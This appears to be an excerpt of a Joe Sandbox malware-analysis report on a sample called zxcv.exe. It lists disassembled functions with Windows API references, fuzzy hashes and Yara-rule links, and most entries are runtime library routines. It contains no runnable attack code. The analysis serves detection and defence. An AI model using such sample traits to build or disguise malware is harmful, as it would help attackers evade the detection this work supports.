FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0025BB84

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 52562e82439da3d3bbe2d5ace1bf061ed34599daedec8a9be85845418fd2f626
Instruction ID: 8c12fc89063b6155d66d9c2e30eb270e16336ee1b34f73ca04545e086dfcf56f
Opcode Fuzzy Hash: 52562e82439da3d3bbe2d5ace1bf061ed34599daedec8a9be85845418fd2f626
Instruction Fuzzy Hash: DF11C4B153191A7F6B122BB1ACCFD6F69ACDE493AB3110164FC45D1100EBF0CD698A79

Function 00241DE3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00241DEF
int.LIBCPMT ref: 00241E02

Part of subcall function 00242A9D: std::_Lockit::_Lockit.LIBCPMT ref: 00242AAE
Part of subcall function 00242A9D: std::_Lockit::~_Lockit.LIBCPMT ref: 00242AC8

std::_Facet_Register.LIBCPMT ref: 00241E35
std::_Lockit::~_Lockit.LIBCPMT ref: 00241E4B

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 380ea1246bf3c5fcf0dc6b97e0d9626bec9aa91c69e5b8f0e9fce2077016d602
Instruction ID: d08cf97f5d4258532dc835ccbc7004a9a4af806705d42950c97f9b33e8b0bc50
Opcode Fuzzy Hash: 380ea1246bf3c5fcf0dc6b97e0d9626bec9aa91c69e5b8f0e9fce2077016d602
Instruction Fuzzy Hash: F101DB3A620524EBCB1EEF94D8468AD7768DF84760F200159F8159B291EF30AE61CF90

Function 00241E5C Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00241E68
int.LIBCPMT ref: 00241E7B

Part of subcall function 00242A9D: std::_Lockit::_Lockit.LIBCPMT ref: 00242AAE
Part of subcall function 00242A9D: std::_Lockit::~_Lockit.LIBCPMT ref: 00242AC8

std::_Facet_Register.LIBCPMT ref: 00241EAE
std::_Lockit::~_Lockit.LIBCPMT ref: 00241EC4

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: dc1f620eb3e40b47df1750fc2f57445710bf4eb92c4d0d9903692ea238cc2dda
Instruction ID: 9bab866542b36ec38e76d9fe3c066cb7b4b8b745875c6cd0f7186dd74681bbce
Opcode Fuzzy Hash: dc1f620eb3e40b47df1750fc2f57445710bf4eb92c4d0d9903692ea238cc2dda
Instruction Fuzzy Hash: EB01DB3A920524EBCB1EEF64DC468AD77A8DF40360B200559FD05AB291EF30AE61CFD0

Function 00241ED5 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00241EE1
int.LIBCPMT ref: 00241EF4

Part of subcall function 00242A9D: std::_Lockit::_Lockit.LIBCPMT ref: 00242AAE
Part of subcall function 00242A9D: std::_Lockit::~_Lockit.LIBCPMT ref: 00242AC8

std::_Facet_Register.LIBCPMT ref: 00241F27
std::_Lockit::~_Lockit.LIBCPMT ref: 00241F3D

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: a68fe93dcbf02df5a2dd72236b30e18880cc6ecd94bb7913fdd46a430b12d591
Instruction ID: a2e5e3b4c97d3d48c55f51ff106b850a7b23445baed7e3ec4f6080f299ea3033
Opcode Fuzzy Hash: a68fe93dcbf02df5a2dd72236b30e18880cc6ecd94bb7913fdd46a430b12d591
Instruction Fuzzy Hash: 91012B76530525ABCB1EEF55D8068AD77A8DF40760B110149F805AB291DF30AE61CF80

Function 00241F4E Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00241F5A
int.LIBCPMT ref: 00241F6D

Part of subcall function 00242A9D: std::_Lockit::_Lockit.LIBCPMT ref: 00242AAE
Part of subcall function 00242A9D: std::_Lockit::~_Lockit.LIBCPMT ref: 00242AC8

std::_Facet_Register.LIBCPMT ref: 00241FA0
std::_Lockit::~_Lockit.LIBCPMT ref: 00241FB6

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 92c6f17487b8f748d56cc3f6f6de26e616d7aa497a35b468a34de46a92635ab1
Instruction ID: 5ae4a8bf49c7f9a88742e54936f11dc879a22e06efe6e2ada540ce59b1405f50
Opcode Fuzzy Hash: 92c6f17487b8f748d56cc3f6f6de26e616d7aa497a35b468a34de46a92635ab1
Instruction Fuzzy Hash: 9A01DB36920624EFCB1DEF54D9458AD77A8EF40360B210655F905AB291EF30EF65CB90

Function 00261C31 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,0025EC4A,00000000,00000001,00000000,00000000,?,00256407,00000000,00000000,00000000), ref: 00261C48
GetLastError.KERNEL32(?,0025EC4A,00000000,00000001,00000000,00000000,?,00256407,00000000,00000000,00000000,00000000,00000000,?,002569C5,00000000), ref: 00261C54

Part of subcall function 00261C1A: CloseHandle.KERNEL32(FFFFFFFE,00261C64,?,0025EC4A,00000000,00000001,00000000,00000000,?,00256407,00000000,00000000,00000000,00000000,00000000), ref: 00261C2A

___initconout.LIBCMT ref: 00261C64

Part of subcall function 00261BDC: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00261C0B,0025EC37,00000000,?,00256407,00000000,00000000,00000000,00000000), ref: 00261BEF

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,0025EC4A,00000000,00000001,00000000,00000000,?,00256407,00000000,00000000,00000000,00000000), ref: 00261C79

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: c5b5696a8cdc5320459686abbfa269dcfb76e72a659efbc96a25a3541afeb60e
Instruction ID: 2c6baafe8221ac2cbd806c96e60e10d4f631521886b38b82db28928fad2d079f
Opcode Fuzzy Hash: c5b5696a8cdc5320459686abbfa269dcfb76e72a659efbc96a25a3541afeb60e
Instruction Fuzzy Hash: 52F01C36450165BBCF622FD5EC0898E3F66FB197A1F044010FA5885131CA72A8B0AB91

Function 002415BE Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 281COMMON

Download Yara Rule

APIs

_strcspn.LIBCMT ref: 0024163E
_strcspn.LIBCMT ref: 00241662

Strings

E&, xrefs: 0024161D

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: _strcspn
String ID: E&
API String ID: 3709121408-2551161167
Opcode ID: eddb57dee7dfbe2e91eb0b33191a97480a1c529f6ef6889555b4ffafed39afba
Instruction ID: 836d1c69b8939136d32bbccc109ab592615bde2d433dbc673d975c6356eafb80
Opcode Fuzzy Hash: eddb57dee7dfbe2e91eb0b33191a97480a1c529f6ef6889555b4ffafed39afba
Instruction Fuzzy Hash: 28B136B16283419FD728DF24C884AABBBE9FF89344F44491DF99987221D730D964CF52

Function 00262135 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 155fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNEL32(00000000,00260DD7,00000000,0025A195,?,?,?,?,?,00262123,00000000,0025A195,00260DD7,?,00000000,0025A195), ref: 00262287
GetLastError.KERNEL32(?,?,?,?,?,00262123,00000000,0025A195,00260DD7,?,00000000,0025A195), ref: 00262294

Strings

#!&, xrefs: 00262173, 002621C4, 002621E1

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: ErrorFileLast
String ID: #!&
API String ID: 734332943-2614669749
Opcode ID: d247ec1c1a37f2e5c838f53d7dcfed8ef481174248143ff20a5e5fbd9f6f7a53
Instruction ID: 730901c060dde96ca6d6a592f67232afc1123e5bf1957448070f378905d10230
Opcode Fuzzy Hash: d247ec1c1a37f2e5c838f53d7dcfed8ef481174248143ff20a5e5fbd9f6f7a53
Instruction Fuzzy Hash: 57510132920E06EAEB248F69CC55B9E7B75AF44321F144158FD15A72D2D770E8F8CB90

Function 00262C13 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0026257F), ref: 00262C2C

Strings

<|&, xrefs: 00262D6B
u:$, xrefs: 00262CF6, 00262DA0, 00262DE6

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: DecodePointer
String ID: <|&$u:$
API String ID: 3527080286-2752425788
Opcode ID: 37661c94f4eff7dc7ab274479d0cac8bbe63cd589929f5347ef4af9dea26f604
Instruction ID: 8f6d849689094e981548b6d725b910c31799644746bedd5b300125c4892d3938
Opcode Fuzzy Hash: 37661c94f4eff7dc7ab274479d0cac8bbe63cd589929f5347ef4af9dea26f604
Instruction Fuzzy Hash: 51518B70924D0ACBCF109F68E94C6ADBFB4FF05308F514055D881AB268CBB889F9CB54

Function 0024A3FD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 0024A422

Strings

RCC, xrefs: 0024A43C
MOC, xrefs: 0024A434

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: bbc037130114fb877631b9fa647eb55c63b9099b1e26f92015ef3997b59eebd1
Instruction ID: 14d08ae21c95fb52812cb5d69e492b8ce60431c2aea920cb45b711ee99e12f68
Opcode Fuzzy Hash: bbc037130114fb877631b9fa647eb55c63b9099b1e26f92015ef3997b59eebd1
Instruction Fuzzy Hash: 9941677290020AAFCF1ADF98CD81AEEBBB5BF48300F158099F904A7211D3359A60DF52

Function 0024AD92 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,00000000,?,?,?,?,0024AF0D,00000002,FlsGetValue,00265DE0,FlsGetValue,00000000,?,00249D9D), ref: 0024AE15
GetProcAddress.KERNEL32(00000000,]&,00000000,?,?,?,?,0024AF0D,00000002,FlsGetValue,00265DE0,FlsGetValue,00000000,?,00249D9D), ref: 0024AE1F

Strings

]&, xrefs: 0024AE1B

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: ]&
API String ID: 3013587201-959001208
Opcode ID: 4a9e88eba407977f33925aee4f2d0fb402b3a7b5d7eae1d99df10cf0d9b0627d
Instruction ID: e1d166275203d54810dc0a24c95bdf7cbea141830848e428e2142e3876364343
Opcode Fuzzy Hash: 4a9e88eba407977f33925aee4f2d0fb402b3a7b5d7eae1d99df10cf0d9b0627d
Instruction Fuzzy Hash: 6A11D3317A5122DF8F2BCF54E88089A73A5FF463507240165EA51DB210EB70DD21CBD2

Function 00245E30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00245E3C
std::_Lockit::~_Lockit.LIBCPMT ref: 00245E98

Strings

u:$, xrefs: 00245E63, 00245E7D

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: u:$
API String ID: 593203224-3033614593
Opcode ID: 355538125083002c2d2385d900aef551c69e107b61fcaf240e18cdca40371d45
Instruction ID: 6888fcf785c7e02dd5c92967c6b5741e504b9137419d0b63d892cac13f515e53
Opcode Fuzzy Hash: 355538125083002c2d2385d900aef551c69e107b61fcaf240e18cdca40371d45
Instruction Fuzzy Hash: FF01B131610A25EFCB09DF14D895E9D7BB8EF85750B140099E8459B361DF70EE41CB50

Function 00242274 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0024227B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 002422B3

Part of subcall function 00245EA1: _Yarn.LIBCPMT ref: 00245EC0
Part of subcall function 00245EA1: _Yarn.LIBCPMT ref: 00245EE4

Strings

bad locale name, xrefs: 002422C1

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: f39188195325a77c11ed51c6f03834ae9ca0523b134a4f1868a3541063b4be54
Instruction ID: 0edcf24667269df75a8062717fe5cfc828544c9dbb78464af098fc249211d5d2
Opcode Fuzzy Hash: f39188195325a77c11ed51c6f03834ae9ca0523b134a4f1868a3541063b4be54
Instruction Fuzzy Hash: 88F0177151AB509F83349F7A98C1447FBE4BE292203948A2EE1DEC3A12D770A414CF6A

Function 002556A1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 002556E1

Strings

u:$, xrefs: 002556D1
InitializeCriticalSectionEx, xrefs: 002556B1

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx$u:$
API String ID: 2593887523-2539010447
Opcode ID: 76c5462b36bf0e4357b058f49ae4d94045fd9cbacf1b00eecce72e35d71620af
Instruction ID: b6a73befaabde32716ca1c2e5a3868dbfa827b6da6123f8e254a94761391b013
Opcode Fuzzy Hash: 76c5462b36bf0e4357b058f49ae4d94045fd9cbacf1b00eecce72e35d71620af
Instruction Fuzzy Hash: A6E092321B06A8B7CB112F51EC29E9E3F15EF517A1F408410FE0C25160CAF289B09A85

Function 00255527 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0025555B

Strings

FlsAlloc, xrefs: 00255537
u:$, xrefs: 00255551

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc$u:$
API String ID: 2773662609-2725278290
Opcode ID: 7ac3a55c799336ab17a7a6548504aba65e5c696cb995e7e98b635bb52d364770
Instruction ID: 059fe419431750f904451dfaf436fdbec2e6b44e0e95eb150133d08cc0aaca47
Opcode Fuzzy Hash: 7ac3a55c799336ab17a7a6548504aba65e5c696cb995e7e98b635bb52d364770
Instruction Fuzzy Hash: FCE0C231AE0A74B3C61036A6EC2E99EBE05CB52B62B444120FE09161819EF009B086D9

Analysis Process: zxcv.exePID: 6480, Parent PID: 6128COMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	2000
Total number of Limit Nodes:	52

Executed Functions

Function 0041FEAF Relevance: 13.8, APIs: 9, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041FB65: CreateFileW.KERNELBASE(?,00000000,?,0041FF58,?,?,00000000,?,0041FF58,?,0000000C), ref: 0041FB82

GetLastError.KERNEL32 ref: 0041FFC3
__dosmaperr.LIBCMT ref: 0041FFCA
GetFileType.KERNELBASE(00000000), ref: 0041FFD6
GetLastError.KERNEL32 ref: 0041FFE0
__dosmaperr.LIBCMT ref: 0041FFE9
CloseHandle.KERNEL32(00000000), ref: 00420009
CloseHandle.KERNEL32(?), ref: 00420156
GetLastError.KERNEL32 ref: 00420188
__dosmaperr.LIBCMT ref: 0042018F

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 87ef763bbd003f1d2de960a3db6ca709dde3cd444b7d1b6f895e6fd8deb0075d
Instruction ID: c043dc6610800097a8c7d9f7805d75e01504a092e95ab29a96a2aa982ce353c5
Opcode Fuzzy Hash: 87ef763bbd003f1d2de960a3db6ca709dde3cd444b7d1b6f895e6fd8deb0075d
Instruction Fuzzy Hash: FCA14732A041559FCF19DF28EC91BAE3BA1AB46314F18016EF801EB3D2C7398957D759

Function 004038C0 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 401
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(shell32.dll), ref: 0040390A

Strings

open, xrefs: 00403E04, 00403E25
.exe, xrefs: 004039E4, 004039F5, 00403C28, 00403C39
shell32.dll, xrefs: 00403905

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: LibraryLoad
String ID: .exe$open$shell32.dll
API String ID: 1029625771-3690275032
Opcode ID: f06aa05bea50d85dbe20034339847ad1e83d37a00a247424d7643769cafcade0
Instruction ID: d55e05632111ddd334f844b1ecdbedc55644a6845c6bb4e419120225b0a5741f
Opcode Fuzzy Hash: f06aa05bea50d85dbe20034339847ad1e83d37a00a247424d7643769cafcade0
Instruction Fuzzy Hash: 22E12A312083408BD718CF28CC45B6FBBE5BF85305F24462DF489AB2D2D779E6458B9A

Function 00418EB1 Relevance: 7.7, APIs: 5, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__alloca_probe_16.LIBCMT ref: 00418F38
__alloca_probe_16.LIBCMT ref: 00418FF9
__freea.LIBCMT ref: 00419060

Part of subcall function 00415426: HeapAlloc.KERNEL32(00000000,?,?,?,00407448,?,?,004038E3,0000000C), ref: 00415458

__freea.LIBCMT ref: 00419075
__freea.LIBCMT ref: 00419085

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: b34ec7378ed80fdedf5b3cd9fd74b686b7ca20f323847e8b562edae9002d46d2
Instruction ID: 5a58541e407446bb28ced3c61191459bbd43b91e1c19ac61a4b7f941500e9d67
Opcode Fuzzy Hash: b34ec7378ed80fdedf5b3cd9fd74b686b7ca20f323847e8b562edae9002d46d2
Instruction Fuzzy Hash: 1451E572600206AFDB249E65CC81EFB3AA9EF48754B15012EFD05D7250EB39DD81C7A9

Function 00411432 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,0041142C,00000016,0040BD98,?,?,A1DECC5C,0040BD98,?), ref: 00411443
TerminateProcess.KERNEL32(00000000,?,0041142C,00000016,0040BD98,?,?,A1DECC5C,0040BD98,?), ref: 0041144A
ExitProcess.KERNEL32 ref: 0041145C

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: fdc9db31659cbe28c415a8b0888f718e5b65b0592ff8268f2e9698ce38014a47
Instruction ID: 3fe6f93935658f8ab67006e652a10cd0383134051074610e396dae59c432ecd7
Opcode Fuzzy Hash: fdc9db31659cbe28c415a8b0888f718e5b65b0592ff8268f2e9698ce38014a47
Instruction Fuzzy Hash: 5DD09E31100148ABCF117F61EC0DA993F2AAF407557858025FA0A56131CB369993AA58

Function 00416DAF Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004164C2: GetConsoleOutputCP.KERNEL32(A1DECC5C,00000000,00000000,0040BDB8), ref: 00416525

WriteFile.KERNELBASE(FFBF5BE8,00000000,?,0040BC75,00000000,00000000,00000000,00000000,?,?,0040BC75,?,?,004328B8,00000010,0040BDB8), ref: 00416F18
GetLastError.KERNEL32(?,0040BC75,?,?,004328B8,00000010,0040BDB8,?,?,00000000,?), ref: 00416F22

Memory Dump Source

Source File: 0000000A.00000002.2695672644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_zxcv.jbxd

